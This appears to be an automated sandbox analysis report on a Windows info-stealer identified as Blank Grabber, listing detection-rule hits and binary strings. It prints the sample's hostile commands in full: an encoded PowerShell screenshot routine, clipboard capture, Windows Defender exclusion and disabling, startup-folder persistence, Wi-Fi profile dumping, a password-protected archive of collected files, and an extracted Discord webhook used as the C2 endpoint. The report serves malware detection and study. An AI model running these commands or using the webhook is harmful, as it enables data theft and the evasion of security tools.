JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\El9HaBFrFM.exe", ParentImage: C:\Users\user\Desktop\El9HaBFrFM.exe, ParentProcessId: 7532, ParentProcessName: El9HaBFrFM.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 3468, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\El9HaBFrFM.exe", ParentImage: C:\Users\user\Desktop\El9HaBFrFM.exe, ParentProcessId: 7532, ParentProcessName: El9HaBFrFM.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'", ProcessId: 7596, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\El9HaBFrFM.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\El9HaBFrFM.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\El9HaBFrFM.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8712, TargetFilename: C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9144, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *, ProcessId: 8992, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7604, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7692, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8572, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\El9HaBFrFM.exe", ParentImage: C:\Users\user\Desktop\El9HaBFrFM.exe, ParentProcessId: 7532, ParentProcessName: El9HaBFrFM.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 8380, ProcessName: cmd.exe
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: El9HaBFrFM.exe.7532.1.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1301205706979938325/6QPgIPYq-Css-OJ6_lkSJ5Pdu0MNeXcvPrjnAZiyfOIJh3PJiYs412SWGodn3lagwGj7"}
              Source: El9HaBFrFM.exeReversingLabs: Detection: 52%
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EE901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,83_2_00007FF6D7EE901C
              Source: https://trksyln.net/ErrorHTTP Parser: Base64 decoded: [null,null,null,null,null,null,[1730398767,181000000],null,null,null,[null,[7]],"https://trksyln.net/Error",null,[[8,"YsgOOctukrI"],[9,"en-US"],[19,"2"],[17,"[0]"]]]
              Source: https://trksyln.net/ErrorHTTP Parser: No favicon
              Source: https://trksyln.net/ErrorHTTP Parser: No favicon
              Source: https://trksyln.net/ErrorHTTP Parser: No favicon
              Source: https://trksyln.net/ErrorHTTP Parser: No favicon
              Source: https://trksyln.net/ErrorHTTP Parser: No favicon
              Source: https://trksyln.net/ErrorHTTP Parser: No favicon
              Source: https://trksyln.net/ErrorHTTP Parser: No favicon
              Source: https://trksyln.net/ErrorHTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51254 version: TLS 1.2
              Source: El9HaBFrFM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: El9HaBFrFM.exe, 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.pdbhP, source: powershell.exe, 0000002E.00000002.1947586190.0000026CB8305000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAFCA000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: El9HaBFrFM.exe, 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: o.pdbE source: powershell.exe, 0000002E.00000002.2106834306.0000026CD013D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.pdb source: powershell.exe, 0000002E.00000002.1947586190.0000026CB8305000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: El9HaBFrFM.exe, 00000000.00000003.1683960250.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2261813551.00007FFE13344000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAF32000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: El9HaBFrFM.exe, 00000000.00000003.1683960250.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2261813551.00007FFE13344000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp
